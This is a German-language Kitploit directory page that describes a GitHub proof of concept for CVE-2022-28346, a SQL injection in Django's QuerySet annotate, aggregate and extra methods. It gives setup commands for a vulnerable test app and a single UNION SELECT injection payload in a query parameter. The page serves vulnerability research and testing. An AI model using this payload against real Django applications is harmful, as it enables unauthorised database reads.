Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-28346 — Ein Problem wurde in Django 2.2 vor 2.2.28, 3.2 vor 3.2.13 und 4.0 vor 4.0.4 entdeckt. Die Methoden QuerySet.annotate(), aggregate() und extra() sind anfällig für SQL-Injection in Spalten-Aliasen über ein manipuliertes Wörterbuch (mit Wörterbuch-Expansion), das als **kwargs übergeben wird. | Kitploit
Tools/GitHubGitHub/vincentinttsh/cve-2022-28346
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationDatenbanksicherheit
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

Repository anzeigen
8vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Ein Problem wurde in Django 2.2 vor 2.2.28, 3.2 vor 3.2.13 und 4.0 vor 4.0.4 entdeckt. Die Methoden QuerySet.annotate(), aggregate() und extra() sind anfällig für SQL-Injection in Spalten-Aliasen über ein manipuliertes Wörterbuch (mit Wörterbuch-Expansion), das als **kwargs übergeben wird.

Teilen

CVE-2022-28346 PoC Tweet

Auswirkungen:

  • Mögliche SQL-Injection in QuerySet.annotate(), aggregate() und extra().

Installation

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

Referenzen

CVE Mitre

Django

Tool herunterladen